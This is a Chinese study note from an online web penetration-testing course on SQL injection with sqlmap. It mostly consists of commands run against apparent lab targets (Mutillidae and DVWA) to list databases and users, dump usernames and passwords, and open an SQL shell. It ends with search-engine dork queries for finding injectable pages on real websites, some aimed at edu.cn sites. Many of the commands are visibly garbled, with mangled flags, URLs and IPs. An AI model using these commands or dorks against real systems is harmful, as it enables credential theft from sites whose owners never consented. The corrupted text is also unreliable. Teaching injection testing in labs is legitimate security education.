SQL 注入攻击_7 | 学习笔记

简介: 快速学习 SQL 注入攻击_7

开发者学堂课程【网络安全攻防 - Web渗透测试SQL 注入攻击_7】学习笔记,与课程紧密联系,让用户快速学习知识。

课程地址:https://developer.aliyun.com/learning/course/630/detail/9910


SQL 注入攻击_7


内容介绍

一、  GET 方法注入

二、  POST 方法注入

三、  数据获取

四、  提权操作

五、  综合实例


一、  GET 方法注入

1.  //获取所有数据库

rootekali:~#sqlmap-u "http://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-1238user-info-php-submit-button-=View+Account+Details"-dbs

image.png

2.  //获得所有用户

root@kali:~#sqlmap-uhttp://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-123&user-info-php-submit-button=View+Account+Details”--us

3.  //获得当前用户

root@kali:-# sqlmap -u "http://192.168.106.134/mutillidae/index .php?page=user-info.php&username=yangge&password-123&user-info-php-submit-button=View-Account+Detailscurrent-user

image.png

4. sqlmap 参数解析

--users

--current-user

--dbs

--current -db

-D "database_name"  --tables

-D “database_name"-T "table_name”--columns

--dump-all

--dump-all --exclude-sysdbs

-D “database name"-T "table_name"--dump

-D "database name"--tables

-D “database_name"-T "table_name"--columns

--batch   //自动化完成

5. 示例步骤:

1) 获得当前数据库

root@kali:# sqlmap -u “http://192.168.106.134/mutillidae/index.php?page=use-info.php?username=yangge&password=1238user-info-php-submit-button=

View+Account+Details”\--batch--current-db

2) 获得数据库表

root@kali:~# sqlmap -u “http://192.168.106.134/mutillidae/index php?page-user-info.php&username=yangge&password=123&user-info-php-submit-button=View+Account +Details”\--batch -D nowasp --tables

image.png

1)  获得表的字段

root@kali:~# sqlmap -uhttp://192.168134/mutillidae/index.php?page-user-info.php&username=eee&password info-php-submit-button=View+Account+Detalls

--batch -D nowasp -T accounts --columns

2)  获得表中的数据

root@kali:~# sqlmap -u"http://192.168.166.134/mut1llidae/index.php?page-user-info.php&username-eee&password=eee&user-info-php-submit-button=View+Account+Details--batch -D nowasp -T accounts -C "username, password" --dump


二、  POST 方法注入

1.  需要带 cookie 才能访问的注入页面,--cookie=””

root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id=18Submit=Submit#\--cookie-PHPSESSID-10jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids-swingset,jotto,phpbb2,rednine;acgroupswithpersist-nada"--batch

image.png

2. root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#”\--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -p id

image.png

1.  root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch --users

2.  root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie="PHPSESSID-i0jcqf4uhd68qujcof3n322e95;securitylow;showhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada"--batch --current-user


三、  数据获取

1. --users

--current -user

--dbs

--current-db

-D database_name--tables

-D database name -T "table name"--columns

--dump-all

--dump-all --exclude-sysdbs

-D "database_name"-T "table_name”-C"usernane, password--dump

2.  root@kali~# sqlmap -u

http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-low;

showhints=1;acopendivids=swingset,jotto,phpbb2,redmine;acgro thpersist-nada” --batchusers

3.  root@kali:~# sqlmap -u "http://92.168.106.134/6

ea ilities/sqli/?id-18Submit-Submit#--cookie="PHPSESSID=10jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada”-- batch --current-db

4. root@kali:~# sqlmap

-u"httpi//192.168.106.134/dvwa/vulnerabilities/sq11/?id=18Submit-Submit#-cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D dvwa--tables

image.png

5. root@kali:~# sqlmap  

-u"http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-1&Submit-Submit#"cookie="PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-1ow;showhint5-1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D "dvwa"-T"users”--columns

6. root@kali:~# sqlmap -u

"http://192.168.106.134/dvwa/vulnerabilities/sq11/?1d-185ubmit-Submdtcookie-"PHPSESSID-10jcqf4uhd68qujcof3n322e95;security-low; showhints

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D "dvwa" -T users" -C "username,password"--dump

7. root@kali:~# sqlmap -u  

http://192.168.106.134/dvwa/vulnerabilities/sq1i/?1d-185ubmit=Submit#”-cookie=”PHPSESSID=i0jcqf4uhd68qujcof3n322e95;secunitv=low:showhints=1;\

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D”dvwa” -T “users"--dump

image.png


四、  提权操作

//与数据库交互--sql-shell

rootfkali:~# sqlmap -u http://192.168.106.134/dvwa/vuinerabilities/sqli/?id=1&Submit=Submit#-cookie="PHPSES5ID=i0jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --batch --sql--shell

image.png


五、  综合实例

1.  通过 Google 搜索可能存在注入的页面

inurl:.php?id

inurl:.jsp?id

inurl:.asp?id=

inurl:/admin/login.php

inurl:.php?id- intitle:美女

2.  通过百度搜索可能存在注入的页面

inurl:news.asp?id= site:edu.cn

inurl:news.php?id= site;edu.cn

inurl:news.aspx?id= site;edu.cn

相关文章
|
3天前
|
SQL 安全
jeecg-boot sql注入漏洞解决
jeecg-boot sql注入漏洞解决
13 0
|
16小时前
|
SQL 关系型数据库 MySQL
0基础学习SQL注入之万能账号密码(BUUctf例题-[极客大挑战 2019]EasySQL1)
0基础学习SQL注入之万能账号密码(BUUctf例题-[极客大挑战 2019]EasySQL1)
|
5天前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
16 0
|
7天前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 参数详解
SQL 注入神器:SQLMap 参数详解
|
13天前
|
SQL 存储 Java
如何避免SQL注入?
【4月更文挑战第30天】如何避免SQL注入?
25 0
|
13天前
|
SQL 安全 PHP
【PHP 开发专栏】PHP 防止 SQL 注入的方
【4月更文挑战第30天】本文介绍了PHP防止SQL注入的策略,包括理解SQL注入的原理和危害,如数据泄露和系统控制。推荐使用参数化查询(如PDO扩展)、过滤和验证用户输入,以及选择安全的框架和库(如Laravel)。此外,强调了保持警惕、定期更新维护和开发人员安全培训的重要性,以确保应用安全。
|
13天前
|
SQL 存储 安全
|
13天前
|
SQL Oracle 关系型数据库
常见 SQL 注入绕过方法
常见 SQL 注入绕过方法
|
13天前
|
SQL Oracle 关系型数据库
利用 SQL 注入提取数据方法总结
利用 SQL 注入提取数据方法总结
|
13天前
|
SQL 关系型数据库 MySQL
利用 SQL 注入识别数据库方法总结
利用 SQL 注入识别数据库方法总结